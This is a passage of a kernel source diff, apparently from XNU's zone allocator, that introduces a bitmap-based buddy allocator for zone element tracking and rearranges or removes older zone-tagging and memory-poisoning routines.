+       vm_size_t hdr_size = sizeof(struct zone_bits_allocator_header);
+       if (n == 0) {
+               hdr_size += sizeof(struct zone_bits_allocator_meta);
        }
-       // free remaining space
-       ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount);
-
-       lck_mtx_unlock(&ztLock);
+       return hdr_size;
 }
 
 static void
-ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size)
+zba_init_chunk(uint32_t n)
 {
-       uint32_t * tagbase;
-       uint32_t   count, block, blocks, idx;
-       size_t     pages;
-
-       pages = atop(size);
-       tagbase = ZTAGBASE(zone, mem);
-
-       lck_mtx_lock(&ztLock);
+       vm_size_t hdr_size = zba_chunk_header_size(n);
+       vm_offset_t page = zba_page_addr(n);
+       struct zone_bits_allocator_header *zbah = zba_header(page);
+       vm_size_t size = ZBA_CHUNK_SIZE;
+       size_t node;
 
-       // fault tagbase
-       ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0);
-
-       if (!zone->tags_inline) {
-               // allocate tags
-               count = (uint32_t)(size / zone_elem_size(zone));
-               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
-               block = ztAlloc(zone, blocks);
-               if (-1U == block) {
-                       ztDump(false);
+       for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) {
+               if (size < hdr_size + (ZBA_GRANULE << o)) {
+                       continue;
                }
-               assert(-1U != block);
+               size -= ZBA_GRANULE << o;
+               node = zba_node(page + size, o);
+               zba_node_flip_split(zbah, zba_node_parent(node));
+               zba_push_block(zba_chain_for_node(zbah, node, o), o);
        }
 
-       lck_mtx_unlock(&ztLock);
-
-       if (!zone->tags_inline) {
-               // set tag base for each page
-               block *= ztTagsPerBlock;
-               for (idx = 0; idx < pages; idx++) {
-                       vm_offset_t esize = zone_elem_size(zone);
-                       tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize);
-               }
-       }
+       zba_meta()->zbam_chunks = n + 1;
 }
 
+__attribute__((noinline))
 static void
-ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size)
+zba_grow(void)
 {
-       uint32_t * tagbase;
-       uint32_t   count, block, blocks, idx;
-       size_t     pages;
-
-       // set tag base for each page
-       pages = atop(size);
-       tagbase = ZTAGBASE(zone, mem);
-       block = tagbase[0];
-       for (idx = 0; idx < pages; idx++) {
-               tagbase[idx] = 0xFFFFFFFF;
-       }
+       uint32_t chunk = zba_meta()->zbam_chunks;
 
-       lck_mtx_lock(&ztLock);
-       if (!zone->tags_inline) {
-               count = (uint32_t)(size / zone_elem_size(zone));
-               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
-               assert(block != 0xFFFFFFFF);
-               block /= ztTagsPerBlock;
-               ztFree(NULL /* zone is unlocked */, block, blocks);
+       zba_populate(chunk);
+       if (zba_meta()->zbam_chunks == chunk) {
+               zba_init_chunk(chunk);
        }
-
-       lck_mtx_unlock(&ztLock);
 }
 
-uint32_t
-zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size)
+static vm_offset_t
+zba_alloc(uint32_t order)
 {
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       struct zone_bits_allocator_header *zbah;
+       uint32_t cur = order;
+       vm_address_t addr;
+       size_t node;
 
-       zone_index_foreach(idx) {
-               zone_t z = &zone_array[idx];
-               if (!z->tags) {
-                       continue;
-               }
-               if (tag_zone_index != z->tag_zone_index) {
-                       continue;
+       while ((addr = zba_try_pop_block(cur)) == 0) {
+               if (cur++ >= ZBA_MAX_ORDER) {
+                       zba_grow();
+                       cur = order;
                }
-
-               *elem_size = zone_elem_size(z);
-               simple_unlock(&all_zones_lock);
-               return idx;
        }
 
-       simple_unlock(&all_zones_lock);
+       zbah = zba_header(addr);
+       node = zba_node(addr, cur);
+       zba_node_flip_split(zbah, zba_node_parent(node));
+       while (cur > order) {
+               cur--;
+               zba_node_flip_split(zbah, node);
+               node = zba_node_left_child(node);
+               zba_push_block(zba_chain_for_node(zbah, node + 1, cur), cur);
+       }
 
-       return -1U;
+       return addr;
 }
 
-#endif /* VM_MAX_TAG_ZONES */
-#pragma mark zalloc helpers
+#define zba_map_index(type, n)    (n / (8 * sizeof(type)))
+#define zba_map_bit(type, n)      ((type)1 << (n % (8 * sizeof(type))))
+#define zba_map_mask_lt(type, n)  (zba_map_bit(type, n) - 1)
+#define zba_map_mask_ge(type, n)  ((type)-zba_map_bit(type, n))
 
-const char *
-zone_name(zone_t z)
+#if !ZALLOC_TEST
+static uint32_t
+zba_bits_ref_order(uint32_t bref)
 {
-       return z->z_name;
+       return bref & 0x7;
 }
 
-const char *
-zone_heap_name(zone_t z)
+static bitmap_t *
+zba_bits_ref_ptr(uint32_t bref)
 {
-       if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) {
-               return kalloc_heap_names[z->kalloc_heap];
-       }
-       return "invalid";
+       return zba_slot_base() + (bref >> 3);
 }
 
-static inline vm_size_t
-zone_submaps_approx_size(void)
+static vm_offset_t
+zba_scan_bitmap_inline(zone_t zone, struct zone_page_metadata *meta,
+    vm_offset_t eidx)
 {
-       vm_size_t size = 0;
+       size_t i = eidx / 32;
+       uint32_t map;
 
-       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
-               size += zone_submaps[idx]->size;
+       if (eidx % 32) {
+               map = meta[i].zm_bitmap & zba_map_mask_ge(uint32_t, eidx);
+               if (map) {
+                       eidx = __builtin_ctz(map);
+                       meta[i].zm_bitmap ^= 1u << eidx;
+                       return i * 32 + eidx;
+               }
+               i++;
        }
 
-       return size;
-}
+       uint32_t chunk_len = meta->zm_chunk_len;
+       if (chunk_len == 1 && zone->z_percpu) {
+               chunk_len = zpercpu_count();
+       }
+       for (int j = 0; j < chunk_len; j++, i++) {
+               if (i >= chunk_len) {
+                       i = 0;
+               }
+               if (__probable(map = meta[i].zm_bitmap)) {
+                       meta[i].zm_bitmap &= map - 1;
+                       return i * 32 + __builtin_ctz(map);
+               }
+       }
 
-bool
-zone_maps_owned(vm_address_t addr, vm_size_t size)
-{
-       return from_zone_map(addr, size);
+       zone_page_meta_accounting_panic(zone, meta, "zm_bitmap");
 }
 
-void
-zone_map_sizes(
-       vm_map_size_t    *psize,
-       vm_map_size_t    *pfree,
-       vm_map_size_t    *plargest_free)
+static vm_offset_t
+zba_scan_bitmap_ref(zone_t zone, struct zone_page_metadata *meta,
+    vm_offset_t eidx)
 {
-       vm_map_sizes(zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP], psize, pfree, plargest_free);
-}
+       uint32_t bits_size = 1 << zba_bits_ref_order(meta->zm_bitmap);
+       bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+       size_t i = eidx / 64;
+       uint64_t map;
 
-vm_map_t
-zone_submap(zone_t zone)
-{
-       return submap_for_zone(zone);
+       if (eidx % 64) {
+               map = bits[i] & zba_map_mask_ge(uint64_t, eidx);
+               if (map) {
+                       eidx = __builtin_ctzll(map);
+                       bits[i] ^= 1ull << eidx;
+                       return i * 64 + eidx;
+               }
+               i++;
+       }
+
+       for (int j = 0; j < bits_size; i++, j++) {
+               if (i >= bits_size) {
+                       i = 0;
+               }
+               if (__probable(map = bits[i])) {
+                       bits[i] &= map - 1;
+                       return i * 64 + __builtin_ctzll(map);
+               }
+       }
+
+       zone_page_meta_accounting_panic(zone, meta, "zm_bitmap");
 }
 
-unsigned
-zpercpu_count(void)
+/*!
+ * @function zone_meta_find_and_clear_bit
+ *
+ * @brief
+ * The core of the bitmap allocator: find a bit set in the bitmaps.
+ *
+ * @discussion
+ * This method will round robin through available allocations,
+ * with a per-core memory of the last allocated element index allocated.
+ *
+ * This is done in order to avoid a fully LIFO behavior which makes exploiting
+ * double-free bugs way too practical.
+ *
+ * @param zone          The zone we're allocating from.
+ * @param meta          The main metadata for the chunk being allocated from.
+ */
+static vm_offset_t
+zone_meta_find_and_clear_bit(zone_t zone, struct zone_page_metadata *meta)
 {
-       return zpercpu_early_count;
+       zone_stats_t zs = zpercpu_get(zone->z_stats);
+       vm_offset_t eidx = zs->zs_alloc_rr + 1;
+
+       if (meta->zm_inline_bitmap) {
+               eidx = zba_scan_bitmap_inline(zone, meta, eidx);
+       } else {
+               eidx = zba_scan_bitmap_ref(zone, meta, eidx);
+       }
+       zs->zs_alloc_rr = (uint16_t)eidx;
+       return eidx;
 }
 
-int
-track_this_zone(const char *zonename, const char *logname)
+/*!
+ * @function zone_meta_bits_init
+ *
+ * @brief
+ * Initializes the zm_bitmap field(s) for a newly assigned chunk.
+ *
+ * @param meta          The main metadata for the initialized chunk.
+ * @param count         The number of elements the chunk can hold
+ *                      (which might be partial for partially populated chunks).
+ * @param nbits         The maximum nuber of bits that will be used.
+ */
+static void
+zone_meta_bits_init(struct zone_page_metadata *meta,
+    uint32_t count, uint32_t nbits)
 {
-       unsigned int len;
-       const char *zc = zonename;
-       const char *lc = logname;
-
-       /*
-        * Compare the strings.  We bound the compare by MAX_ZONE_NAME.
-        */
+       static_assert(ZONE_MAX_ALLOC_SIZE / ZONE_MIN_ELEM_SIZE <=
+           ZBA_GRANULE_BITS << ZBA_MAX_ORDER, "bitmaps will be large enough");
 
-       for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) {
+       if (meta->zm_inline_bitmap) {
                /*
-                * If the current characters don't match, check for a space in
-                * in the zone name and a corresponding period in the log name.
-                * If that's not there, then the strings don't match.
+                * We're called with the metadata zm_bitmap fields already
+                * zeroed out.
                 */
-
-               if (*zc != *lc && !(*zc == ' ' && *lc == '.')) {
-                       break;
+               for (size_t i = 0; 32 * i < count; i++) {
+                       if (32 * i + 32 <= count) {
+                               meta[i].zm_bitmap = ~0u;
+                       } else {
+                               meta[i].zm_bitmap = zba_map_mask_lt(uint32_t, count);
+                       }
                }
+       } else {
+               uint32_t order = flsll((nbits - 1) / ZBA_GRANULE_BITS);
+               uint64_t *bits;
 
-               /*
-                * The strings are equal so far.  If we're at the end, then it's a match.
-                */
+               assert(order <= ZBA_MAX_ALLOC_ORDER);
+               assert(count <= ZBA_GRANULE_BITS << order);
 
-               if (*zc == '\0') {
-                       return TRUE;
+               zba_lock();
+               bits = (uint64_t *)zba_alloc(order);
+               zba_unlock();
+
+               for (size_t i = 0; i < 1u << order; i++) {
+                       if (64 * i + 64 <= count) {
+                               bits[i] = ~0ull;
+                       } else if (64 * i < count) {
+                               bits[i] = zba_map_mask_lt(uint64_t, count);
+                       } else {
+                               bits[i] = 0ull;
+                       }
                }
-       }
 
-       return FALSE;
+               meta->zm_bitmap = (uint32_t)((vm_offset_t)bits -
+                   (vm_offset_t)zba_slot_base()) + order;
+       }
 }
 
-#if DEBUG || DEVELOPMENT
-
-vm_size_t
-zone_element_info(void *addr, vm_tag_t * ptag)
+/*!
+ * @function zone_meta_bits_merge
+ *
+ * @brief
+ * Adds elements <code>[start, end)</code> to a chunk being extended.
+ *
+ * @param meta          The main metadata for the extended chunk.
+ * @param start         The index of the first element to add to the chunk.
+ * @param end           The index of the last (exclusive) element to add.
+ */
+static void
+zone_meta_bits_merge(struct zone_page_metadata *meta,
+    uint32_t start, uint32_t end)
 {
-       vm_size_t     size = 0;
-       vm_tag_t      tag = VM_KERN_MEMORY_NONE;
-       struct zone_page_metadata *meta;
-       struct zone *src_zone;
+       if (meta->zm_inline_bitmap) {
+               while (start < end) {
+                       size_t s_i = start / 32;
+                       size_t s_e = end / 32;
 
-       if (from_zone_map(addr, sizeof(void *))) {
-               meta = zone_native_meta_from_addr(addr);
-               src_zone = &zone_array[meta->zm_index];
-#if VM_MAX_TAG_ZONES
-               if (__improbable(src_zone->tags)) {
-                       tag = (ZTAG(src_zone, (vm_offset_t) addr)[0] >> 1);
+                       if (s_i == s_e) {
+                               meta[s_i].zm_bitmap |= zba_map_mask_lt(uint32_t, end) &
+                                   zba_map_mask_ge(uint32_t, start);
+                               break;
+                       }
+
+                       meta[s_i].zm_bitmap |= zba_map_mask_ge(uint32_t, start);
+                       start += 32 - (start % 32);
                }
-#endif /* VM_MAX_TAG_ZONES */
-               size = zone_elem_size(src_zone);
        } else {
-#if CONFIG_GZALLOC
-               gzalloc_element_size(addr, NULL, &size);
-#endif /* CONFIG_GZALLOC */
-       }
-       *ptag = tag;
-       return size;
-}
+               uint64_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
 
-#endif /* DEBUG || DEVELOPMENT */
+               while (start < end) {
+                       size_t s_i = start / 64;
+                       size_t s_e = end / 64;
 
-/* Someone wrote to freed memory. */
-__abortlike
-static void
-zone_element_was_modified_panic(
-       zone_t        zone,
-       vm_offset_t   element,
-       vm_offset_t   found,
-       vm_offset_t   expected,
-       vm_offset_t   offset)
-{
-       panic("a freed zone element has been modified in zone %s%s: "
-           "expected %p but found %p, bits changed %p, "
-           "at offset %d of %d in element %p, cookies %p %p",
-           zone_heap_name(zone),
-           zone->z_name,
-           (void *)   expected,
-           (void *)   found,
-           (void *)   (expected ^ found),
-           (uint32_t) offset,
-           (uint32_t) zone_elem_size(zone),
-           (void *)   element,
-           (void *)   zp_nopoison_cookie,
-           (void *)   zp_poisoned_cookie);
+                       if (s_i == s_e) {
+                               bits[s_i] |= zba_map_mask_lt(uint64_t, end) &
+                                   zba_map_mask_ge(uint64_t, start);
+                               break;
+                       }
+                       bits[s_i] |= zba_map_mask_ge(uint64_t, start);
+                       start += 64 - (start % 64);
+               }
+       }
 }
 
-/* The backup pointer is stored in the last pointer-sized location in an element. */
-__header_always_inline vm_offset_t *
-get_backup_ptr(vm_size_t elem_size, vm_offset_t *element)
+/*!
+ * @function zone_bits_free
+ *
+ * @brief
+ * Frees a bitmap to the zone bitmap allocator.
+ *
+ * @param bref
+ * A bitmap reference set by @c zone_meta_bits_init() in a @c zm_bitmap field.
+ */
+static void
+zone_bits_free(uint32_t bref)
 {
-       return (vm_offset_t *)((vm_offset_t)element + elem_size - sizeof(vm_offset_t));
+       zba_lock();
+       zba_free((vm_offset_t)zba_bits_ref_ptr(bref), zba_bits_ref_order(bref));
+       zba_unlock();
 }
 
-/*
- * The primary and backup pointers don't match.
- * Determine which one was likely the corrupted pointer, find out what it
- * probably should have been, and panic.
+/*!
+ * @function zone_meta_is_free
+ *
+ * @brief
+ * Returns whether a given element appears free.
  */
-__abortlike
-static void
-backup_ptr_mismatch_panic(
-       zone_t        zone,
-       struct zone_page_metadata *page_meta,
-       vm_offset_t   page,
-       vm_offset_t   element)
-{
-       vm_offset_t primary = *(vm_offset_t *)element;
-       vm_offset_t backup  = *get_backup_ptr(zone_elem_size(zone), &element);
-       vm_offset_t likely_backup;
-       vm_offset_t likely_primary;
-       zone_addr_kind_t kind = zone_addr_kind(page, zone_elem_size(zone));
-
-       likely_primary = primary ^ zp_nopoison_cookie;
-       boolean_t   sane_backup;
-       boolean_t   sane_primary = zone_page_meta_is_sane_element(zone, page_meta,
-           page, likely_primary, kind);
-       boolean_t   element_was_poisoned = (backup & 0x1);
-
-#if defined(__LP64__)
-       /* We can inspect the tag in the upper bits for additional confirmation */
-       if ((backup & 0xFFFFFF0000000000) == 0xFACADE0000000000) {
-               element_was_poisoned = TRUE;
-       } else if ((backup & 0xFFFFFF0000000000) == 0xC0FFEE0000000000) {
-               element_was_poisoned = FALSE;
-       }
-#endif
-
-       if (element_was_poisoned) {
-               likely_backup = backup ^ zp_poisoned_cookie;
+static bool
+zone_meta_is_free(struct zone_page_metadata *meta, zone_element_t ze)
+{
+       vm_offset_t eidx = zone_element_idx(ze);
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               return meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit;
        } else {
-               likely_backup = backup ^ zp_nopoison_cookie;
-       }
-       sane_backup = zone_page_meta_is_sane_element(zone, page_meta,
-           page, likely_backup, kind);
-
-       /* The primary is definitely the corrupted one */
-       if (!sane_primary && sane_backup) {
-               zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
-       }
-
-       /* The backup is definitely the corrupted one */
-       if (sane_primary && !sane_backup) {
-               zone_element_was_modified_panic(zone, element, backup,
-                   (likely_primary ^ (element_was_poisoned ? zp_poisoned_cookie : zp_nopoison_cookie)),
-                   zone_elem_size(zone) - sizeof(vm_offset_t));
-       }
-
-       /*
-        * Not sure which is the corrupted one.
-        * It's less likely that the backup pointer was overwritten with
-        * ( (sane address) ^ (valid cookie) ), so we'll guess that the
-        * primary pointer has been overwritten with a sane but incorrect address.
-        */
-       if (sane_primary && sane_backup) {
-               zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               return bits[zba_map_index(uint64_t, eidx)] & bit;
        }
-
-       /* Neither are sane, so just guess. */
-       zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0);
 }
 
-/*
- * zone_sequestered_page_get
- * z is locked
+/*!
+ * @function zone_meta_mark_free
+ *
+ * @brief
+ * Marks an element as free and returns whether it was marked as used.
  */
-static struct zone_page_metadata *
-zone_sequestered_page_get(zone_t z, vm_offset_t *page)
+static bool
+zone_meta_mark_free(struct zone_page_metadata *meta, zone_element_t ze)
 {
-       const zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
+       vm_offset_t eidx = zone_element_idx(ze);
 
-       if (!zone_pva_is_null(z->pages_sequester)) {
-               if (os_sub_overflow(z->sequester_page_count, z->alloc_pages,
-                   &z->sequester_page_count)) {
-                       zone_accounting_panic(z, "sequester_page_count wrap-around");
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) {
+                       return false;
+               }
+               meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit;
+       } else {
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               if (bits[zba_map_index(uint64_t, eidx)] & bit) {
+                       return false;
                }
-               return zone_meta_queue_pop(z, &z->pages_sequester, kind, page);
+               bits[zba_map_index(uint64_t, eidx)] ^= bit;
        }
-
-       return NULL;
+       return true;
 }
 
-/*
- * zone_sequestered_page_populate
- * z is unlocked
- * page_meta is invalid on failure
+/*!
+ * @function zone_meta_mark_used
+ *
+ * @brief
+ * Marks an element as used and returns whether it was marked as free
  */
-static kern_return_t
-zone_sequestered_page_populate(zone_t z, struct zone_page_metadata *page_meta,
-    vm_offset_t space, vm_size_t alloc_size, int zflags)
+static bool
+zone_meta_mark_used(struct zone_page_metadata *meta, zone_element_t ze)
 {
-       kern_return_t retval;
+       vm_offset_t eidx = zone_element_idx(ze);
 
-       assert(alloc_size == ptoa(z->alloc_pages));
-       retval = kernel_memory_populate(submap_for_zone(z), space, alloc_size,
-           zflags, VM_KERN_MEMORY_ZONE);
-       if (retval != KERN_SUCCESS) {
-               lock_zone(z);
-               zone_meta_queue_push(z, &z->pages_sequester, page_meta, ZONE_ADDR_NATIVE);
-               z->sequester_page_count += z->alloc_pages;
-               unlock_zone(z);
+       if (meta->zm_inline_bitmap) {
+               uint32_t bit = zba_map_bit(uint32_t, eidx);
+               if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) {
+                       meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit;
+                       return true;
+               }
+       } else {
+               bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+               uint64_t bit = zba_map_bit(uint64_t, eidx);
+               if (bits[zba_map_index(uint64_t, eidx)] & bit) {
+                       bits[zba_map_index(uint64_t, eidx)] ^= bit;
+                       return true;
+               }
        }
-       return retval;
+       return false;
 }
 
-#pragma mark Zone poisoning/zeroing
-
+#endif /* !ZALLOC_TEST */
+/*! @} */
+#pragma mark ZTAGS
+#if !ZALLOC_TEST
+#if VM_MAX_TAG_ZONES
 /*
- * Initialize zone poisoning
- * called from zone_bootstrap before any allocations are made from zalloc
+ * Zone tagging allows for per "tag" accounting of allocations for the kalloc
+ * zones only.
+ *
+ * There are 3 kinds of tags that can be used:
+ * - pre-registered VM_KERN_MEMORY_*
+ * - dynamic tags allocated per call sites in core-kernel (using vm_tag_alloc())
+ * - per-kext tags computed by IOKit (using the magic VM_TAG_BT marker).
+ *
+ * The VM tracks the statistics in lazily allocated structures.
+ * See vm_tag_will_update_zone(), vm_tag_update_zone_size().
+ *
+ * If for some reason the requested tag cannot be accounted for,
+ * the tag is forced to VM_KERN_MEMORY_KALLOC which is pre-allocated.
+ *
+ * Each allocated element also remembers the tag it was assigned,
+ * in its ztSlot() which lets zalloc/zfree update statistics correctly.
  */
-__startup_func
-static void
-zp_bootstrap(void)
-{
-       char temp_buf[16];
 
-       /*
-        * Initialize backup pointer random cookie for poisoned elements
-        * Try not to call early_random() back to back, it may return
-        * the same value if mach_absolute_time doesn't have sufficient time
-        * to tick over between calls.  <rdar://problem/11597395>
-        * (This is only a problem on embedded devices)
-        */
-       zp_poisoned_cookie = (uintptr_t) early_random();
+// for zones with tagging enabled:
 
-       /* -zp: enable poisoning for every alloc and free */
-       if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) {
-               zp_factor = 1;
-       }
+// calculate a pointer to the tag base entry,
+// holding either a uint32_t the first tag offset for a page in the zone map,
+// or two uint16_t tags if the page can only hold one or two elements
 
-       /* -no-zp: disable poisoning */
-       if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) {
-               zp_factor = 0;
-               printf("Zone poisoning disabled\n");
-       }
+#define ZTAGBASE(zone, element) \
+       (&((uint32_t *)zone_tagbase_min)[atop((element) - \
+           zone_info.zi_map_range[ZONE_ADDR_NATIVE].min_address)])
 
-       /* Initialize backup pointer random cookie for unpoisoned elements */
-       zp_nopoison_cookie = (uintptr_t) early_random();
+static vm_offset_t  zone_tagbase_min;
+static vm_offset_t  zone_tagbase_max;
+static vm_offset_t  zone_tagbase_map_size;
+static vm_map_t     zone_tagbase_map;
 
-#if MACH_ASSERT
-       if (zp_poisoned_cookie == zp_nopoison_cookie) {
-               panic("early_random() is broken: %p and %p are not random\n",
-                   (void *) zp_poisoned_cookie, (void *) zp_nopoison_cookie);
-       }
-#endif
+static vm_offset_t  zone_tags_min;
+static vm_offset_t  zone_tags_max;
+static vm_offset_t  zone_tags_map_size;
+static vm_map_t     zone_tags_map;
 
-       /*
-        * Use the last bit in the backup pointer to hint poisoning state
-        * to backup_ptr_mismatch_panic. Valid zone pointers are aligned, so
-        * the low bits are zero.
-        */
-       zp_poisoned_cookie |=   (uintptr_t)0x1ULL;
-       zp_nopoison_cookie &= ~((uintptr_t)0x1ULL);
+// simple heap allocator for allocating the tags for new memory
 
-#if defined(__LP64__)
-       /*
-        * Make backup pointers more obvious in GDB for 64 bit
-        * by making OxFFFFFF... ^ cookie = 0xFACADE...
-        * (0xFACADE = 0xFFFFFF ^ 0x053521)
-        * (0xC0FFEE = 0xFFFFFF ^ 0x3f0011)
-        * The high 3 bytes of a zone pointer are always 0xFFFFFF, and are checked
-        * by the sanity check, so it's OK for that part of the cookie to be predictable.
-        *
-        * TODO: Use #defines, xors, and shifts
-        */
+static LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */
 
-       zp_poisoned_cookie &= 0x000000FFFFFFFFFF;
-       zp_poisoned_cookie |= 0x0535210000000000; /* 0xFACADE */
+enum{
+       ztFreeIndexCount = 8,
+       ztFreeIndexMax   = (ztFreeIndexCount - 1),
+       ztTagsPerBlock   = 4
+};
 
-       zp_nopoison_cookie &= 0x000000FFFFFFFFFF;
-       zp_nopoison_cookie |= 0x3f00110000000000; /* 0xC0FFEE */
+struct ztBlock {
+#if __LITTLE_ENDIAN__
+       uint64_t free:1,
+           next:21,
+           prev:21,
+           size:21;
+#else
+// ztBlock needs free bit least significant
+#error !__LITTLE_ENDIAN__
 #endif
+};
+typedef struct ztBlock ztBlock;
 
-       /*
-        * Initialize zp_min_size to two cachelines. Elements smaller than this will
-        * be zero-ed.
-        */
-       ml_cpu_info_t cpu_info;
-       ml_cpu_get_info(&cpu_info);
-       zp_min_size = 2 * cpu_info.cache_line_size;
-}
-
-inline uint32_t
-zone_poison_count_init(zone_t zone)
-{
-       return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^
-              (mach_absolute_time() & 0x7);
-}
+static ztBlock * ztBlocks;
+static uint32_t  ztBlocksCount;
+static uint32_t  ztBlocksFree;
 
-#if ZALLOC_ENABLE_POISONING
-static bool
-zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem)
+static uint32_t
+ztLog2up(uint32_t size)
 {
-       bool poison = false;
-       uint32_t zp_count_local;
-
-       assert(!zone->percpu);
-       if (zp_factor != 0) {
-               /*
-                * Poison the memory of every zp_count-th element before it ends up
-                * on the freelist to catch use-after-free and use of uninitialized
-                * memory.
-                *
-                * Every element is poisoned when zp_factor is set to 1.
-                *
-                */
-               zp_count_local = os_atomic_load(zp_count, relaxed);
-               if (__improbable(zp_count_local == 0 || zp_factor == 1)) {
-                       poison = true;
-
-                       os_atomic_store(zp_count, zone_poison_count_init(zone), relaxed);
-
-                       /* memset_pattern{4|8} could help make this faster: <rdar://problem/4662004> */
-                       vm_offset_t *element_cursor  = ((vm_offset_t *) elem);
-                       vm_offset_t *end_cursor      = (vm_offset_t *)(elem + zone_elem_size(zone));
-
-                       for (; element_cursor < end_cursor; element_cursor++) {
-                               *element_cursor = ZONE_POISON;
-                       }
-               } else {
-                       os_atomic_store(zp_count, zp_count_local - 1, relaxed);
-                       /*
-                        * Zero first zp_min_size bytes of elements that aren't being poisoned.
-                        * Element size is larger than zp_min_size in this path as elements
-                        * that are smaller will always be zero-ed.
-                        */
-                       bzero((void *) elem, zp_min_size);
-               }
+       if (1 == size) {
+               size = 0;
+       } else {
+               size = 32 - __builtin_clz(size - 1);
        }
-       return poison;
-}
-#else
-static bool
-zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem)
-{
-#pragma unused(zone, zp_count, elem)
-       assert(!zone->percpu);
-       return false;
+       return size;
 }
-#endif
 
-__attribute__((always_inline))
-static bool
-zfree_clear(zone_t zone, vm_offset_t addr, vm_size_t elem_size)
+// pointer to the tag for an element
+static vm_tag_t *
+ztSlot(zone_t zone, vm_offset_t element)
 {
-       assert(zone->zfree_clear_mem);
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       bzero((void *)(addr + ptoa(i)), elem_size);
+       vm_tag_t *result;
+       if (zone->tags_inline) {
+               result = (vm_tag_t *)ZTAGBASE(zone, element);
+               if ((PAGE_MASK & element) >= zone_elem_size(zone)) {
+                       result++;
                }
        } else {
-               bzero((void *)addr, elem_size);
+               result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE(zone, element)[0] +
+                   (element & PAGE_MASK) / zone_elem_size(zone)];
        }
-
-       return true;
+       return result;
 }
 
-/*
- * Zero the element if zone has zfree_clear_mem flag set else poison
- * the element if zp_count hits 0.
- */
-__attribute__((always_inline))
-bool
-zfree_clear_or_poison(zone_t zone, uint32_t *zp_count, vm_offset_t addr)
+static uint32_t
+ztLog2down(uint32_t size)
 {
-       vm_size_t elem_size = zone_elem_size(zone);
-
-       if (zone->zfree_clear_mem) {
-               return zfree_clear(zone, addr, elem_size);
-       }
-
-       return zfree_poison_element(zone, zp_count, (vm_offset_t)addr);
+       size = 31 - __builtin_clz(size);
+       return size;
 }
 
+static void
+ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags)
+{
+       vm_map_offset_t addr = (vm_map_offset_t) address;
+       vm_map_offset_t page, end;
+
+       page = trunc_page(addr);
+       end  = round_page(addr + size);
+
+       for (; page < end; page += page_size) {
+               if (!pmap_find_phys(kernel_pmap, page)) {
+                       kern_return_t __unused
+                       ret = kernel_memory_populate(map, page, PAGE_SIZE,
+                           KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG);
+                       assert(ret == KERN_SUCCESS);
+               }
+       }
+}
+
+static boolean_t
+ztPresent(const void * address, size_t size)
+{
+       vm_map_offset_t addr = (vm_map_offset_t) address;
+       vm_map_offset_t page, end;
+       boolean_t       result;
+
+       page = trunc_page(addr);
+       end  = round_page(addr + size);
+       for (result = TRUE; (page < end); page += page_size) {
+               result = pmap_find_phys(kernel_pmap, page);
+               if (!result) {
+                       break;
+               }
+       }
+       return result;
+}
+
+
+void __unused
+ztDump(boolean_t sanity);
+void __unused
+ztDump(boolean_t sanity)
+{
+       uint32_t q, cq, p;
+
+       for (q = 0; q <= ztFreeIndexMax; q++) {
+               p = q;
+               do{
+                       if (sanity) {
+                               cq = ztLog2down(ztBlocks[p].size);
+                               if (cq > ztFreeIndexMax) {
+                                       cq = ztFreeIndexMax;
+                               }
+                               if (!ztBlocks[p].free
+                                   || ((p != q) && (q != cq))
+                                   || (ztBlocks[ztBlocks[p].next].prev != p)
+                                   || (ztBlocks[ztBlocks[p].prev].next != p)) {
+                                       kprintf("zterror at %d", p);
+                                       ztDump(FALSE);
+                                       kprintf("zterror at %d", p);
+                                       assert(FALSE);
+                               }
+                               continue;
+                       }
+                       kprintf("zt[%03d]%c %d, %d, %d\n",
+                           p, ztBlocks[p].free ? 'F' : 'A',
+                           ztBlocks[p].next, ztBlocks[p].prev,
+                           ztBlocks[p].size);
+                       p = ztBlocks[p].next;
+                       if (p == q) {
+                               break;
+                       }
+               }while (p != q);
+               if (!sanity) {
+                       printf("\n");
+               }
+       }
+       if (!sanity) {
+               printf("-----------------------\n");
+       }
+}
+
+
+
+#define ZTBDEQ(idx)                                                 \
